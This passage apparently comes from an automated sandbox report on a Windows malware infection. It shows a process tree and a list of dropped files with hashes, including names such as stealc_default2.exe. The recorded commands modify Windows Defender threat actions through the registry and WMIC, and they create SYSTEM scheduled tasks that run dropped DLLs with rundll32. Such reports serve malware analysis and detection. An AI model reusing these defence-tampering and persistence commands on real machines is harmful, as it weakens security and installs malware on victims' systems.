                                                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                            PID:3272
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:2432
                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:3276
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:3252
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  PID:2052
                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:2104
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                PID:3368
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:880
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                      PID:3800
                                                                                                                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:3236
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  PID:1924
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:3348
                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:3604
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:3612
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            PID:3884
                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:2872
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:532
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:2968
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:3576
                                                                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:2072
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\ktXIOP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                        PID:3288
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\lMXQfzT.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                        PID:3068
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /END /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4060
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /DELETE /F /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4052
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\CHOlfgE.xml" /RU "SYSTEM"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                            PID:1564
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\hztlqqW.xml" /RU "SYSTEM"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                            PID:3840
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\KmqpOMA.xml" /RU "SYSTEM"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                            PID:1056
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\PkqrAkG.xml" /RU "SYSTEM"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                            PID:3884
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "kjGlTxIfJQSbObiUU" /SC once /ST 13:14:22 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\NLKzepTD\xDKpETm.dll\",#1 /zdidy 385121" /V1 /F
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                            PID:3000
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /run /I /tn "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:3136
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "XPtJj1" /SC once /ST 03:15:14 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                            PID:3544
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /run /I /tn "XPtJj1"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:3904
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /DELETE /F /TN "XPtJj1"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:2388
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /DELETE /F /TN "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:2120
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 376 -s 1548
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                PID:2064
                                                                                                                                                                                                            • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\NLKzepTD\xDKpETm.dll",#1 /zdidy 385121
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:3528
                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\NLKzepTD\xDKpETm.dll",#1 /zdidy 385121
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                  PID:3372
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /DELETE /F /TN "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:3792
                                                                                                                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:2200
                                                                                                                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:1912
                                                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:2024

                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.1MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b065973ac7608f1e69156ae4e64b4a7a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      abff642354524f8cd6540b5ddf9524b8e0a25431

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      ad44672877d29308968ec75c901003d117c3eb74c075e1d43664f30e5d295b1c

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      3b8317a95c338f40838703ac5d11a15acf4864a83d6537e7fcf89e14c05386010697284831c8284d9e043ede4ce2a370c77bc0d81a43947dd3e35a05e7eba14e

                                                                                                                                                                                                                    • C:\ProgramData\HCAAEBKE

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      92KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      6093b9b9effe107a1958b5e8775d196a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      f86ede48007734aebe75f41954ea1ef64924b05e

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      a10b04d057393f5974c776ed253909cafcd014752a57da2971ae0dddfa889ab0

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      2d9c20a201655ffcce71bfafa71b79fe08eb8aa02b5666588302608f6a14126a5a1f4213a963eb528514e2ea2b17871c4c5f9b5ef89c1940c40c0718ec367a77

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      342B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      eea299459ccd4eea3db1747b3500f5d7

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      61dc3e420eb21661b06d3cd0e6fca87ea4256db0

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      a7d880ca5ba6b3c7dd33730997528196238d6936a53408014dc9c6f22775122f

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      1556cc182213fcfcafffd5c97fd4a0942a9d374a43b5845371654890c3056b4da12bfeb53bb36039ba2b74ec5ab31773d40fb5e4a8ec790b7753563b9b3fe4c3

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      187B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      136B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      150B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      eb3a6b53b0b6d5bf10ba45c7bfb35afe

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      ad672899dc2a376d29a780ae73faa54cb3ea8cb8

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      53e9bc6fee1d2aadc808de66e16b51e962f2534818e979bd4b4f501f4b89b97c

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      22d29524f225d96358e37aee52f26a4c90b057f10e27cf966f2ff954e8caa21a837900ec2b0f74642a092c9574cf3577b667b0985d1ad6d026c4f22dce0a7d71

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      27KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b10e19d29fdbb70fc5a11afe4758c02b

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      a77492cc03e7c3e4920f6e0dc7d05447fb29821d

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      c99d564f6b7b203766594ccb4cd18ff95296e676df162e143c1cc281780ad7df

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      099382704159a41e0134ad97414a2554171ccc16f98f6d82ba9b349b30e64a6812a28e333569b1f5270cf4e1693acf03095a4a6eed8a40b73896af97d1f5c407

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0I0VVMWQ\download[1].htm

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      1B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      cfcd208495d565ef66e7dff9f98764da

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      8c9fbd4a7df885e43f68f1aeb6dc718b

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      210fafeef4396967ee7c750bb7961726d82da84e

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      624fd26c2e4eb0df9133e1dd8d7f0797cf1d94e252196aadaebb414aa9716f44

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      4884db7b2627c732f2ba21a487917e49bbfcd1351b32d6c70eafdf9f20c96dac2d0fbaba0050c59350eb12cdec8c5332f2b668d2d273b6487fa830a143cf5869

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\thumbnails\dbb303e8878093beb83e43755b8acbad.png

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      bbf9532813411a0581b949f486ae757a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      6fbfb454ae0fdcdc745ef311baaf4174aa4b8958

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      e3874e80ab63b935f050f87a707c62a43a1b3a6655a7b8ee5430b86965024c66

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      aefe889f687743fb9190ba7e181e4fdce8766f1f405c4b62e19429e34dc01fe371f36e2984d1a60c0a0a540486b00be111590d3838139f9b922a973111c51afa

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      312KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      389881b424cf4d7ec66de13f01c7232a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      d3bc5a793c1b8910e1ecc762b69b3866e4c5ba78

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      9d1211b3869ca43840b7da1677b257ad37521aab47719c6fcfe343121760b746

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      2b9517d5d9d972e8754a08863a29e3d3e3cfde58e20d433c85546c2298aad50ac8b069cafd5abb3c86e24263d662c6e1ea23c0745a2668dfd215ddbdfbd1ab96

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      ec23d4868753f523df127f531451dcbd

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      8a172e091d057a8db1e3e1999d48060967b99f36

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      5a4308d45dc245870376ece2209450e5ca46872e632c81c3c61178f139ef223d

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      2e7b63f43a49514d9c98f4ef1964d4ad2b2eef5d88500098246a31d6391f68715bd2a216a662836815615fe4cc2410fe32eacfdd0d7b3cf16f58c816a0c651fb

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      416KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      f5d7b79ee6b6da6b50e536030bcc3b59

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      751b555a8eede96d55395290f60adc43b28ba5e2

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2d89e961ea7cd52023e194c98df7468a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      df3eed7289c53225ce2a7daa7cf320906367c0b4

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      1bbb54d08f8fc5768e9fd594e1c610c7cd50d5ad046d91e92fe7c3a382f4597f

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      f9bf9330ac6be319404725f4339341a84d5a5fc42d9a5432f199e3ecbf43077c13c30c1c6a5be93c6197dd543b6fee94c1a98ace4c4fdd814886c818c639d34c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      187KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      7a02aa17200aeac25a375f290a4b4c95

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      7cc94ca64268a9a9451fb6b682be42374afc22fd

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      836799fd760eba25e15a55c75c50b977945c557065a708317e00f2c8f965339e

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      f6ebfe7e087aa354722cea3fddd99b1883a862fb92bb5a5a86782ea846a1bff022ab7db4397930bcabaa05cb3d817de3a89331d41a565bc1da737f2c5e3720b6

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.1MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      7fa5c660d124162c405984d14042506f

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      69f0dff06ff1911b97a2a0aa4ca9046b722c6b2f

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      fd3edfaff77dd969e3e0d086495e4c742d00e111df9f935ed61dfba8392584b2

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      d50848adbfe75f509414acc97096dad191ae4cef54752bdddcb227ffc0f59bfd2770561e7b3c2a14f4a1423215f05847206ad5c242c7fd5b0655edf513b22f6c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      494KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      6760374f17416485fa941b354d3dd800

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      d88389ec19ac3e87bc743ba3f8b7c518601fdbf9

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      9dc31fbd03da881700908423eb50c6b0c42c87fec28e817449d3dd931802c9f5

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      6e4d2f17cb93fe831198c2eaa35bf030d6a06d620645d3e1452c6bd6e77e42baa9dc323fd60a2c5ae1d89124adde69972c489739d4bd73ba01b95b829a777eab

